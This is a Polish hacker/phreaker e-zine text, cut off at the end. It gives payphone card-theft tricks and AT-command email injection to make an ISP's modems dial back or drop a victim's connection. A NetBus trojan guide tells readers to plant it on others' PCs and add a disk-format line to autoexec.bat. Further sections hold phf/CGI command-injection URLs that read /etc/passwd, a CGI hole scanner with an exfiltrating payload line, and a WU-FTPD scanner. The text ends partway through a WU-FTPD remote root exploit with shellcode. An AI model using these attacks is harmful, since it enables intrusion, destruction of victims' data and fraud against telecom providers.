Jest to ryzykowny trik bo:
*czasami ludzie sprawdzaja co biora

ZUL NUMBER 2 (na niebieskie z rura)

Podchodzimy do niebieskiego i patrzymy w miejsce gdzie wypluwa karty , co widzimy ?

      ______________________
     //--------------------\\
    ||                      ||
    ||                      || 
    ||----------------------||
    || URMET    1           ||
     \\____________________//

Wiec zginamy karte w pol o tak /\ i wpychamy ja dosyc dalego w otwor (tak zeby nie wypadla).
W ten sposob zrobimy taki smieszny koszyczek <==== .
Dobra, wystarczy ze pujdziemy sobie do domciu wrocimy wieczorem i zbierzemy zniwo...

Nie testowac takich zul-o-bug'ow na ludziach typu : dresy->koomora->nie wyrazna gemba
      
__________________________________________________________________________________________
VI.CIEKAWOSTKI

	A.<DUPERELE>
Wbrew naturze monterzy robia sie coraz bardziej przyjazni,sprzedaja kluczyki,programing
cards,back door'y=lewe linje (od 200 zl),nie lubia swojego pracodawcy prawie tak jak my,
ale tez znam monterow ktorzy robia zasadzki na phreakerow! Niby umawiaja sie na sprzedanie klucza,
a potem sladza ciebie i oczekujac na powiniecie nogi !
Jest to przestroga dla naiwnych.Ja tam wierze "moich" monterow ktorych znam,rozmawiam i kupuje 
sprzet nigdy mnie nie zawioda inie sprawdza mi mojej skrzynki w piwnicy! heheh

NETIA ?? To jest chyba jedyny nasz rachunek ... Dokladne nie wiem gdzie (w jakich miastach) 
dziala , bo z kazdym miesiacem coraz wiecej miast obdarzane jest jej uslugami...
NETIA : czyzby "Konkurencja w telekomunikacji" ?? To sie zobaczy... Z czasem . TEPESA 100%
cos kombinuje ... CO TAKIEGO ZNOOF ? Zobaczymy...

	B.<HAPPY 99>
Co to qrwa yest? Jest to trojan ktory 'rozmnarza' sie przez poczte elektroniczna . Jak dostaliscie
mejla z zalacznikem pod tytulem "Happy99" - nie otwierajcie go (prawdo podobnie siedzi tam nasz 
konik). Jesli jednak jestes naiwny i dales sie nabrac (znaczy sie otworzyles go) to trzeba go teraz
wyperswadowac . Utworz jakis pliczek batch (bat) i wklej to co podam nizej :

----------------------CUT HERE-----------------------------------
@echo off
echo -=BLAz3 WITA=-
echo napisane by me na podstawie sfojego widzi mi sie...
echo Trwa usuwanie wirusa z twojego sysiemu :-)
cd c:\
cd windows
cd system
del ska.exe 
del ska.dll
copy wsock32.ska wsock32.dll
del wsock32.ska
echo No i jush PO ZABAWIE !
exit
----------------------CUT HERE-----------------------------------

	C.<ANTY NUKE>
Mala lata dla windziarzy - uchroni ich przed pakietami Out Of Bound (OOB).

---CUT HERE---

REGEDIT4

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]
"BSDUrgent"="0"

---CUT HERE---

SPOTYKANE Przyrostki:

[COM] Komercyjny
[EDU] Edukacyjny
[GOV] Rzadowy
[INT] Miedzynarodowy
[MIL] Wojskowy
[NET] Sieciowy
[ORG] Organizacjyjny
[RPA] Arpanet
[ATO] NATO
__________________________________________________________________________________________
VII.NUMBERS

     A.<HOT NUMBERS>
Pare numerkow by my & by my scanner ? :

0-8001-20-200
0-8001-20-067
0-8001-20-062
0-8001-20-055
0-8001-20-035
0-8001-20-023
0-8001-20-107
0-8001-20-121
0-8001-20-127
0-8001-20-153
0-8001-20-159
0-8001-20-178
0-8001-20-203
0-8001-20-206
0-8001-20-209
0-8001-20-210
0-8001-20-212
0-8001-20-215
0-8001-20-216
0-8001-20-217
0-8001-20-229
0-8001-20-241
0-8001-20 212
0-8001-20 127
0-8001-20 019
0-8001-20 023
0-8001-20 200
0-8001-20 015
0-8001-20 055
0-8001-20 210
0-8001-20 215
0-8001-20 815
0-8001-20 153
0-8001-30 055

Hehe password i loginy to nie jest moja mocna strona,
Ale uwazajta ni dzwonta z domu jezeli wasza centrala ma caller id (CID) bo moga was latwo udupic nie spodziewani goscie typu:
*Men in blek
*TP-psy
*FBI : [Sekret SER-zwis]

	B.<HUNTING>
Jak szukac?

RECZNIE (znaczy sie manual) bo wszelake scannery to JEDEN-WIELKI-SHIT , moze i sa szybkie 
ale chuja warte , lepiej sobie usiasc w domu i napierdalac spox ' ojnie w dial-panel ...
A no 08001 i dalej intuicja ... Najlepiej szukac na swieta,lub w niedziele - ni ma nikogo w 
danej firmie i zglasza sie modemix lub wogole bedzie cicho. 
Po czym rozpoznac ze trafilem na dobry number ?
W sluchawce slyszymy specyficznie piekne (jak dla mnie lepsze brzmienie niz dial-tone)
"piii-tri-tititi" *nie koniecznie w tej samej kolejnosci* ... 
LUB PRZESKANOWAC JAKIES NUMERKI PRZEZ MODEM...

Co robic jak ci sie nudzi?? Dzwon na 956 i ponabijaj sie z glupich debili . Raz zadzwonilem i
powiedzialem ze automat "zjadl mi karte i nie kce mi oddac!",a wstretna baba powiedziala 
"Prosze przyjsc do nas na ul.Raclawicka i zlorzyc zarzalenie!" , i co ? Poszedlem , monterowi
nie kcialo sie isc tam gdzie mnie automat niby zrobil w "konia"
i dal mnie dwie karty po 100 kredytow,ktore uprzednio zajebal z poczty~
(sam sie koles przyznal![znaczy sie bez bicia])
NIE SKANUJCIE NUMEROW 3 CYFROWYCH - skanowalem I CHUJ TAM BYL ! Lepiej zajac sie nowymi 
numerkami skladajacych sie z 4 cyfr , narazie zajalem sie 92-** , ale to tez bedzie pic na wode.
Lepiej zajac sie czyms porzytecznym typu BOX'y bo taka zabawa w numerki CHUJ DA , ofszem
sa extendery , ale kto chce to niech probuje...

__________________________________________________________________________________________
VIII.TIPS & TRICKS (dawne "SPOSOBY & KRUCZKI")

	A.<I'VE GOT POWER IN MY MAIL> (house box)

HOUSE BOX - Nazwa wziela sie od mojego kochanego domku... Dlaczego?? Bo wlasnie w nim wymyslilem
tego box'a ! : LOL
Dobra to jak zrobic takiego "HOUSE BOX'a" ??
Ten sposob dziala jeszcze gdzie-niegdzie,czyli mozna poprobowac!
	Co bedzie potrzebne??:

*modem 
*komputer
*linja telefoniczna

	Co trza zrobic:

Preparujemy e-mail na dowolnym programie pocztowym,poczym zamiast tematu wpisujemy ciag znakow:
"+++ath0,,,,,,atdt<numer>" (w miejscu <numer> wpisujemy numerek z ktorym modem tp-sow ma sie polaczyc).
Wysylamy go najlepiej do siebie i w chwili odbierania poczty powinno nam zerwac polaczenie ,
a jak nie zerwie to sami to robimy ! Co z tego?? Caly myk polega na tym,ze kiedy przeslemy
w ciagu strumiena danych polecenie terminala AT to nie dokonfigurowany modem tps'sow pocznie
wykonywac to co mu napiszemy...
Co z tego ze zadzwoni na jakis numerek???
Nic,ale mozemy wygenerowac sprytnego callback'a . Jak ??
A tak:
W temacie maila wpisujemy +++ath0,,,,,,atdt<numer> (jak twoja centrala reaguje na tony) lub 
+++ath0,,,,,,atdp<numer>
(jak twoja centrala reaguje na pulsy/przerywania) . W miejsce [numer] wpisujemy swoj numerek,
z ktorego dzwonimy.
Co dalej???
Wysylamy,odbieramy,jak nam nie zerwie to sami zrywamy i czekamy jak zadzwoni...to w terminalu
piszemy tak zeby nasz modem odebral , chyba: ats0=1. Jak odbierze i bedzie "piiiii trititiiiti"
to masz callback i ty nigdzie nie dzwonisz tylko cfaniaki(TPsy) do ciebie i jeszcze oni za 
wszystko placa! Ale moga cie latwo nakryc , ale i tak moga ci naskoczyc,bo ty tylko odbiersz?!
Hmm.Ale sa wady! Bo jak bedziesh kcial odebrac poczte to albo bedzie ci zrwalo,albo , albo...
Ale mozna to ominac: www.konto.pl i usuwamy bez odbierania...Jak mamy konto unixowe to no problem
normalnie laczymy sie telenet'em,ftp albo ssh i usuwamy nie kciana poczte!
A jak nie dziala , to nie miej do mnie zalu.

	B.<HOW TO FUCK UP "LAMMA LIFE?">
Jeszcze jest jedna metoda na utrudnienie jakiemos lammerowi zycia w mailu , a dokladnie w
temasie polecenia pakietu AT ! jakiego? A,np. ATH0+++ co odpowiada nastepnym funkcja:
ath0-ustawia modem tpsow na stan przyjmowania polecien (nie wiem dokladnie jakich)
+++ - rozlacza modem tpsow !!!
I sobie lammah poczty nie odbierze!
Jak nie dziala , to twoja centrala albo tego lammusa jest odporna na takie chwyty??!!
Hmm ... Mozecie pokombimowac z poleceniami AT,jak juz cos wam wyjdzie to mail 2 me!!??

__________________________________________________________________________________________

IX.P3W33 BOX.

Dlaczego go tak reklamuje ? Bo takie zerowanie linii 100% works na starszych centralach typu
"STOWENGEAR" !
*Zasady dzialania :


Ja tak mam i nie place rachunkow , tylko sam abonament...
Tylko jest jeszcze jeden myk,zeby wyczuc czy dobra linje zerujemy , bo qwa jak bedziemy dzfonic
z tej zle zzerowanej linji to "pipa" i zabulimy za fszystkie polaczenia oraz dostaniemy nowy 
przydomek : "ALIAS LAMA" ...

__________________________________________________________________________________________
X.SILVER BOX

	A.<CO TO QRWA JEST>
To nic innego jak inna nazwa znanego wszystkim tone - dialerka . Porzadny dialer generuje 
tony central A,B,C,D i te inne czyli podstawowe 1,2,3,4,5,6,7,8,9,0 . Podam tutaj czestotliwosci
podstawowych i tych ponadpodstawowych tonow DTMF:

+------------------------------------------------+---------+
|  ZASTOSOWANIE       |  NAZWA   | CZESTOTLIWOSC |PRIORYTET|
+------------------------------------------------+---------+
| zwyczajne ZERO      |    0     |  1477+941Hz   |    P    |
| zwyczajna jedynka   |    1     |  1209+697Hz   |    O    |
| zwyczajne dwa       |    2     |  1336+697Hz   |    D    |
| zwyczajne trzy      |    3     |  1477+697Hz   |    S    |
| zwyczajne cztery    |    4     |  1209+770Hz   |    T    |
| zwyczajne piec      |    5     |  1336+770Hz   |    A    |
| zwyczajne szesc     |    6     |  1477+770Hz   |    W    |
| zwyczajne siedem    |    7     |  1209+852Hz   |    O    |
| zwyczajne osiem     |    8     |  1336+852Hz   |    W    |
| zwyczajne dziewiec  |    9     |  1477+852Hz   |    E    |
+------------------------------------------------+---------+
| reset , mute        |    *     |  1209+941Hz   |  PONAD  |
| hash , redial       |    #     |  1477+941Hz   |    P    |
| programing A - 997  |    A     |  1633+697Hz   |    O    |
| programing B - 998  |    B     |  1633+770Hz   |    D    |
| programing C - 999  |    C     |  1633+852Hz   |    S    |
| programing D - budka|    D     |  1633+941Hz   |    T.   |
+---------------------+----------+---------------+---------+

	B.<JAK ZROBIC>

Mozna sobie wygenerowac na roznorodnych programach wszelakie tony , najlepsze do takich celow 
beda : Cool Edit Pro (zwykly tez jest oka) , Blue Beep , Box Emu - ma gotowe , Gold Wave .
Albo mozne qpic sobie jakis maly telefonik z wybieraniem tonowym od ruskich na targu i poddac
go malej obrubce zeby go jeszcze bardziej zmniejszyc np . przepilowac na pol , potem zlorzyc na
w miejscach przeciecia i pozlutowywac kablami te najistotniejsze sciezki ... Najlepiej zrobic 
sobie dialer odrazu z
phreak-o-matem - czyli zeby byl z miktofonem i dalo by sie latwo nim podpiac&pogadac z 
jakiejs lewej linji telefinicznej (tylko nie podpinac mi sie pod linje wysokiego napiecia!).
Jeszcze mozna sobie zamowic w jakis tam pismach np . "ELEKTRONIKA PRAKTYCZNA" lub 
"PRAKTYCZNY ELEKTRONIK" - NI WIM JAKI NUMER , ale we wszystkich jest cos podobnego na zamowienie.

Jak juz takiego zdobedziemy to czyt . dzial z bugiem URMET'y-<3 sekundy>

_________________________________________________________________________________________
XII.ZMIANY CO DO POPRZEDNICH VER.

Hmm. Zmiany co do poprzednich wersji?? Dodalem pate nowych textow , poprawilem "wyglad" ,
liryke (bylo kilka zwrotuff ktore zostaly wczesniej nie przemyslane, a teraz poprawione).
Zmienilo sie moje zdanie na temat kilku osob (FUCK TO V3N0MAH!!). Doswiadczenie rosnie z dnia 
na dzien wiec takie "dupowate" apgrejdy mogl bym walic codziennie ! Co jeszcze dodac moge ,
aaa w nastepnym uaktualnieniu sprobuje opisac szerzej numerki 0700 i nowy bug CK KLAN'u
na aparaty wrzutowe.

********** NetBus FAKJU by [_BL@z3_] for 'lame' & NewBie's *********************
______________________________________________________________________________

1. WSTEP
          A. CO TO QRWA JEST ?
          B. ZASTOSOWANIE 
          C. UWAGI 
______________________________________________________________________________

2. CO I JAK ?

	  A. ZARZUCAMY NETBUSA !
	  B. CONNECT
          C. OPIS NARZEDZI
          D. CO JEST PRZYDATNE
______________________________________________________________________________

3. VERSJE
______________________________________________________________________________



1.WSTEP
          A. CO TO QRWA JEST ?

A no to jest moje FAQ (Frequently Asked Questions) , w wolnym tlumaczeniu 'FAKJU' czyli 
najczesciej zadawane pytania przez lame jak i zaawansowanych juserow , ma to na celu pomodz
poczatkujacym jak i lamerom w edukacji 'he'he'. Wszyscy wiedza ze NetBus to 'WIN-ONLY-SHIT' 
i troszke 'lame' jest nim sie bawic , ale czesto padaja pytania "CO TO?" , "DO CZEGO SLUZY"
itp. Sprobuje wam troszke wyjasnic na czym to polega . Powiem jednym slowem :
NetBus nie ma nic wspolnego z hackiem i tylko lame (win users) sie nim bawia ...

	  B. ZASTOSOWANIE

Zastosowanie tego trojana jest wszelakie , kiedy chcemy dokuczyc lame-qmplowi to instalujemy
na jego kompie server NetBus'a i z domciu podmieniamy mu autoexec.bat lub dodajemy skrypcik
do tego bat'a np : "@format c: /autotest >nul" , hehe no i mamy go z glowy .
NetBus przydatny jest do wyludzania danych np. sciagamy sobie pliczek regedit.exe i 
wyciagamy haselka do woli ...

          C. UWAGI

Po calej zabawie lepiej odinstalowac caly server z komputra naszej ofiary tak zeby nie mial 
podejrzen .
___________________________________________________________________________________________
															   |
2. CO I JAK ?										   			   |
											   				   |
	  A. Przed cala zabawa trzeba zapuscic na kompa 'Pacza' (patch.exe) lub w postaci      |
trojana											                     |
(whackamole.exe , iexplore.exe lub back door w rejestrze win shitu) . Jak to zrobic ?        |
											   				   |
Pierwszy sposob :									     				   |
											   				   |
*Idziemy do lamy , pozbywamy sie jego towarzystwa , do stacji wpychamy wczesniej 	   	   |
zpreparowana dyskietke z paczem lub w postaci trojana , odpalamy 			   		   |
(2x klikamy na ikonka pacza lub tego drugiego)						   		   |
, spadamy do siebie , odpalamy kompa , netbusa .					   		   |
											   				   |
Sposob drugi (z Diesirae.faq):								               |
											   				   |
'Kolejny tekst OffTopic, ale mam nadzieje, ze sie przyda... Podczas licznych		   	   |
rozmow na ircu za starych dobrych czasow spotykalem ludzi, ktorzy mnie 			         |
szczegulnie wkurwiali (np dziadek z #olsztyn), wiec co trzeba robic. Po pierwsze	         |
nigdy goscia nie obrazaj. Mow tak jakbys byl slave a on master. Jak gadasz z		   	   |
gosciem, ktory sie uwaza za hackera to mu powiedz, ze cie do niego wyslal jakis		   |
twoj kumpel bo mu bardzo w czymstam pomogla osoba, ktorej chcemy wsadzic pecza		   |
Gosciu sie nie zabardzo orienci, i zazwyczaj mowi cos w stylu: "ja sie tym		   	   |
zajmuje od niedawna", w tym momencie trzeba powiedziec, ze musisz konczyc z nim	         |
gadke, bo i tak pewnie nie bedzie cie rozumial. Gosciu bedzie chcial z toba		   	   |
gadac, ale ty mu mowisz, ze chciales mu dac fajnego exploita, czy jakies tam		         |
inne chujstwo, ale widzisz, ze to nie ma sensu, bo on i tak nie bedzie umial		         |
tego uruchomic. W tym momencie ugodziles w jego godnosc. Bedzie cie nawet 		         |		
blagal o te cos, zeby udowodnic tobie i sobie jaki jest mocny w te klocki.		         |
Mowisz takiemu osobnikowi, zeby tego nie rozdawal innym ludziom, bo to jest                  |
zbyt cenny stuff (albo cos takiego) i slesz mu to. Teraz wystarczy zrobic cos		         |
takiego: 										    				   |
download autoexec.bat									                     |
dodac do autoexeca linijke z "@format c: /autotest >nul" albo czyms takim i		   	   |
uploadowac to tej osobie. Teraz resetujesz mu kompa i pa pa niedojebancu... :) '	   	   |
											   				   |
											   				   |
	  B. CONNECT									   			   |
Do polaczenia z zainfekowanym komputerem potrzebne jest nam jego IP . Jak je zdobyc ?	   |
											   				   |
*Zapytac										   				   |
*Zciagnac od niego z chaty								   			   |
*Jak jest na IRC to go mamy ... FRAGMET P0WER&LCAMTUF FAQ :				   		   |
'''											   				   |
- Wpisz na ircu /whois i nick goscia							   		   |
- Pojawi sie cos w stylu "Address: wiochmen@port23.pol.pl"				   		   |
- Wcisnij "start", wybierz "uruchom..." i wpisz "ping port23.pol.pl"			   	   |
- Pojawi sie okienko, a w nim powoli pojawi sie kilka linii:				   	   |
    Pinging port23.pol.pl [194.204.153.23] with 32 bytes of data:			   		   |
    ...											   			   |
- Wazny dla ciebie jest adres IP, czyli 194.204.153.23					   	   |
'''											   				   |
											   				   |
Potem jak juz mamy IP to kopjujemy sobie do schowka i wklejamy w netbusie 		   	   |
(okienko * HOST NAME\IP *) . Biezemy connect i jestesmy w srodku .			   	   |
											   				   |
Mam tu jedno IP dzialajace juz chyba z pol roku , 					   		   |
instalowalem pacza w szkole i nikt sie nie kapnal?! 195.136.53.55 i milej zabawy .	   	 |
											   				 |
	  C.OPIS NARZEDZI 								   			 |
LEGEDA :										   				 |
											   				 |
*GLOWNY PRZYCISK WYBIERANY Z GLOWNEGO PANELA NETBUSA.					   		 |
+TEXT POKAZYWANY ZAMIAST PRZYCISKU								             |
-POD PRZYCISK KAZDEJ FUNKCJI WYBIERANEJ Z GLOWNEGO PANELU				   		 |
											   				 |
  ++++++++++++++++++++++++PRZYCISKI (te mniejsze) & inne (wazne) ++++++++++++++++	   	 |
											   				 |
* CONNECT ! - Polaczenie z zainfekowanym komputrem					   		 |
* SCAN      - Skanowanie sieci w poszukiwaniu 'ofiar'					   		 |
* ADD IP    - Dodajemy IP do naszej listy 						   		 |
* DEL IP    - Kasujemy IP z naszej listy						   			 |
* ABOUT     - O autorze & 100pka							   			 |
											   				 |
+ PORT         - Port NetBusa na ktorym zostal zainstalowany 				   	 |
* HOST NAME\IP -IP potencjalnej ofiary							   		 |
* FUNCTION DELAY - Odstep w ktorym beda wysylane komendy go naszego zainfekowanego host'a  |
											   				 |
   ++++++++++++++++++++++++PRZYCISKI (te duze)++++++++++++++++				   	 |
											   				 |
*SERVER ADMIN - Mozemy chronic nasza ofiare , tak zebymy tylko my mnieli do niego dostep   |
(nie stosowac przy polaczeniach TPSA DialUp itp . poniewaz z kazdym polaczeniem dostajemy  |
nowy IP)										   				 |
											   				 |
  -Add IP -       Dodajemy IP z ktorego mozna bedzie sie z ofiara polaczyc 		   	 |
  -Remove IP -    Usuwamy IP z ktorego mozna bedzie sie z ofiara polaczyc 		   	 |
  -Close server - Zamykamy server 							   			 |
  -Remove server -Usuwamy server z komputra ofiary					   		 |
											   				 |
*OPEN CDROM - Nawet 'luki' by wiedzial ...						   		 |
											   				 |
*SHOW IMAGE -Uruchamiamy jakiegos jotpega\gifa na maszynie ofiary			   		 |
											   				 |
*SWAP MOUSE -Przestawia przyciski myszy (lewy=prawy , prawy=lewy)			   		 |
											   				 |
*START PROGRAM  -Uruchamiamy jakis program na maszynie ofiary 				   	 |
											   				 |
*MSG MANAGER    -Przesylamy wiadomosci , ostrzezenia , pytania dla za paczowanego komputra |
											   			   |
*SCREENDUMP     -taki ScreenGRAB							   `		   |
											   			   |
*GET INFO       - Informacje na temat naszej ofiary					   	   |
 											   			   |
*PORT REDIRECT  -'Przekierowywujemy port'						   		   |
											   			   |
*PLAY SOUND     - Uruchamiamy jakiegos wav'a na maszynie ofiary				   |
											   			   |
*EXIT WINDOWS   - Ofuara wylacza natychmiast sfojego OS'a				   	   |
											   			   |
*SEND TEXT      - Wysylamy text								   	   |
											   			   |
*ACTIVE WNDS    - Aktywne okna 								   	   |
											   			   |
  -Refresh        - Odswierzenie							   		   |
  -Kill wnd       - 'zabijamy' (wylaczamy) aktywna aplikacje				   |
  -Focus wnd      - Zawieszamy aktywna aplikacje					   	   |
											   			   |
*APP REDIRECT   - Przekierowywujemy konsole i\o na dany port				   |
											   			   |
*MOUSE POS      - Ustawiamy pozycje myszy						   		   |
											                     |
*LISTEN         - Sluchamy i piszemy (przydatne kiedy nasza ofiara gada np. przez Irc) |
											   		         |
*SOUND SYSTEM   - Podglasniamy i sciszamy...						   	   |
											   			   |
*SERVER SETUP   - Samo mowi za siebie , fajne opcje . Mozemy wyslac mejla z komputra   |
naszej ofiary										   		   |
											   			   |
*CONTROL MOUSE  -Przejmujemy mysz ( com1 )						   	   |
											   			   |
-.Sa to sposoby
bazowane na dziurach php i phf:

http://jakis.tam.host/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://jakis.tam.host/cgi-bin/php.cgi?/etc/passwd
http://jakis.tam.host/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
http://jakis.tam.host/cgi-bin/phf?Qalias=hell%0auname%20-a%0a 
http://jakis.tam.host/cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
http://jakis.tam.host/cgi-bin/campas?%0acat%0a/etc/passwd%0a
http://jakis.tam.host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://jakis.tam.host/cgi-bin/view-source?../../../../../../../etc/passwd
http://jakis.tam.host/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://jakis.tam.host/cgi-bin/php.cgi?/etc/passwd
http://jakis.tam.host/cgi-bin/view-source?../../../../../../../etc/passwd

W miejsce <jakis.tam.host> wpisujemy nasz cel -=of koz=-.

	B.	<SKANER DZIUR WWW>

Zamieszczam maly skaner by ET dziurek php i phf , jednak za bardzo w go nie wierzcie...

-- CUTE HERE --

/* V.I.T.O
   Vicious Internet TOol  by ET Lownoise Colombia 1997.
   Copyshit (:Q~) ET 1997.

   Test (T.E.S.T!!!) a web server for interesting MUST NOT HAVE cgi's.
   note that this program sucks too.

   2 Files:
     -Vito.c
     -Vito.ini  <---- you can edit this one....so u can upgrade
		      this program. Just follow the sintax.
   etorres@cyberservices.com
   Why is necesary a disclaimer when nobody reads it?.

   Compile for dummies
   ===================
	  cc -o vito vito.c
   Execute for dummies
   ===================
	  vito <host>
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define TAMANO 1024

int sock;
struct sockaddr_in sock_dest;
char host_dest[100];

main(int argc,char *argv[])
{


 FILE *ini;       /*check for vito.ini*/

 int a,
     b,
     c,
     d,
     x;

 struct hostent *pastelito;

 char buffer[TAMANO],
      bufrec[TAMANO],
      buftmp[TAMANO],
      encabezado[50];


   if (argc < 2) {
      fprintf(stdout,"V.I.T.O by ET Lownoise 97\n");
      fprintf(stdout,"Usage: %s <host> [> file]\n",argv[0]);
      fprintf(stdout,"Note: I know this program sucks.. it\n");
      fprintf(stdout,"      just make things easy.\n");
      exit(0);
   }

   if((ini=fopen("vito.ini","r"))==NULL){
      fprintf(stdout,"%s needs his ini file: vito.ini\n",argv[0]);
      exit(0);
   }

   if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
      pastelito = gethostbyname(argv[1]);
      if (pastelito == NULL) {
	 fprintf(stdout,"Ahhhhhhh! cannot resolve host %s\n",argv[1]);
	 exit(0);
      }
      sprintf(host_dest,"%d.%d.%d.%d",(unsigned char )
pastelito->h_addr_list[0][0],
				      (unsigned char )
pastelito->h_addr_list[0][1],
				      (unsigned char )
pastelito->h_addr_list[0][2],
				      (unsigned char )
pastelito->h_addr_list[0][3]);
   }
   else {
      strncpy(host_dest,argv[1],99);
   }
   fprintf(stdout,"V.I.T.O.\n");
   fprintf(stdout,"Attac...Testing host: %s ",host_dest);

   /*ET*/

   sock_dest.sin_family = AF_INET;
   sock_dest.sin_port = htons(80);                               /* www
port */
   sock_dest.sin_addr.s_addr = inet_addr(host_dest);

   while(fgets(buffer,TAMANO,ini)!=NULL){                  /*Buffer line
size*/
      if(buffer[0]=='['){
	 /*   Buffer division*/
	 strcpy(buftmp,buffer);
	 strcpy(buffer,strchr(buftmp,'G'));
	 strncpy(encabezado,buftmp,strlen(buftmp)-strlen(buffer)+1);
	 encabezado[strlen(buftmp)-strlen(buffer)]='\0';


	 sock = socket(AF_INET,SOCK_STREAM,0);
	 if(sock < 0) {
	   fprintf(stdout,"ERROR: socket() failed\n");
	   exit(0);
	 }

	 x = connect(sock,(struct sockaddr *)
&sock_dest,sizeof(sock_dest));
	 if(x < 0){
	   fprintf(stdout,"Upps.. can't connect to port 80\n");
	 }

	 fprintf(stdout,
	
"\n|-------------------------------------------------------------|\n");
	 fprintf(stdout,"  CGI: %s\n",encabezado);
	 fprintf(stdout,"  Sending.\n");
	 fprintf(stdout,"  %s",buffer);
	
fprintf(stdout,"|-------------------------  ----------------------|\n");
	 send(sock,buffer,TAMANO*sizeof(char),0);
	 bzero(buffer,TAMANO);
	 fprintf(stdout,"  Receiving.\n\n");
	 while((x=recv(sock,bufrec,TAMANO*sizeof(char),0))!=0){
		fprintf(stdout,"%s",bufrec);
		bzero(bufrec,TAMANO);
	 }
	 close(sock);
      }
   }
   fclose(ini);
   fprintf(stdout,
	
"\n|=============================================================|\n");
   fprintf(stdout,"Vito End.    ET Lownoise 1997\n");
}

-- CUTE HERE --

-- CUTE HERE --

##############################################################
#   vito.ini                                                 #
##############################################################

[phf passwd] GET /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
[phf uname] GET /cgi-bin/phf?Qalias=hell%0auname%20-a%0a
[finger] GET /cgi-bin/finger?%0a
[test-cgi cgis] GET /cgi-bin/test-cgi?%20*%0a
[test-cgi dirs] GET /cgi-bin/test-cgi?%20\*%0a
[php/fi] GET /cgi-bin/php.cgi?/etc/passwd
#[Access control on W3C httpd server] GET //secret/index.html
[IRIX handler <space is TAB>] GET /cgi-bin/handler/useless_shit;cat    
/etc/passwd|?data=Download
#[mglimpse] GET
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5user\@et.com\</etc/passwd;eval$CMD;echo

#end of ini file PLEASE SEND ME SOME NEW VERSION OF THIS INI

-- CUTE HERE --

Czek it : http://www.free.net.pl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
	" Smile , you're on candid camera " - admin ma NIE ZLE poczucie humoru... 
Zreszta poczytajcie jego fakjusy.
_______________________________________________________________________________________________
XIV.  FTP BUG's

A.	<WUFTPD BUFFER OVERFLOW SCANNER>
Tytul mowi sam za siebie :))))
---CUT HERE---
#include <netdb.h>

#define FTPPORT 21
#define VERBOSE 1

int
main (int argc, char **argv)
{
 struct hostent *hp;
 struct in_addr addr;
 struct sockaddr_in s;
  u_char *buf[280];
  int p, i;

  if (argc == 1)
    {
      printf("WUftpd Buffer overflow scanner.\n");
      printf("Written by 03m0s1s 3/19/1999\n");
      printf ("Usage: %s <hostname>\n",argv[0]);
      exit (1);
    }

  hp = gethostbyname (argv[1]);
  if (!hp) exit (1);

  bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
  p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
  s.sin_port = htons (FTPPORT);
  s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
  connect (p, &s, sizeof (s));
  alarm (4);                    /*Time out after 4 seconds */
  read (p, buf, 255); /* Grab the banner*/

  if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))
    {
      if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
        printf ("%s is patched.\n", inet_ntoa (addr));
      else
        printf ("%s is vulnerable.\n", inet_ntoa (addr));
/*It must be the "Mon Aug 3 19:17:20 EDT 1998) ready." banner. */
    }
  else
    printf ("%s does not look BETA-18.\n", inet_ntoa (addr));

  if (VERBOSE)
    printf ("%s\n\n", buf);
  write (p,"bye\n",4); /*We just want the banner no need to stick around.*/

}
---CUT HERE---

B.    <WUFTPD 2.4.2-BETA18 SPL01T>

Jak jush zeskanowalismy to teraz potrzebny nam bedzie spl01t ;]
---CUT HERE---
/*
        THIS IS PRIVATE! DO NOT DISTRIBUTE!!!!   PRIVATE!

        WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)
        for linux x86 (redhat 5.2)

        by duke
        duke@viper.net.au

        BIG thanks to stran9er for alot of help with part of the shellcode!
        i fear stran9er, but who doesn't? !@$ :)

        Greets to: #!ADM, el8.org users,

        To exploit this remotely they need to have a directory you can
        have write privlidges to.. this is the <dir> argument.. you can
        also use this locally by specifying -l <ur login> -p <urpass> with the
        <dir> = your home directory or something..(must begin with '/')
        also alignment arg is how return address  is aligned.. shouldnt need it,
        but if u do it should be between 0 and 3

        It takes about 10 seconds after "logged in" so be patient.
        -duke
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
//#include <linux/time.h>
//#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

#define RET 0xbfffa80f

void logintoftp();
void sh();
void mkd(char *);
int max(int, int);
long getip(char *name);

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";

char tmp[256];
char name[128], pass[128];

int sockfd;

int main(int argc, char **argv)
{
        char sendln[1024], recvln[4048], buf1[800], buf2[1000];
        char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1));
        int len, offset = 0, i, align=0;
        struct sockaddr_in cli;

        if(argc < 3){
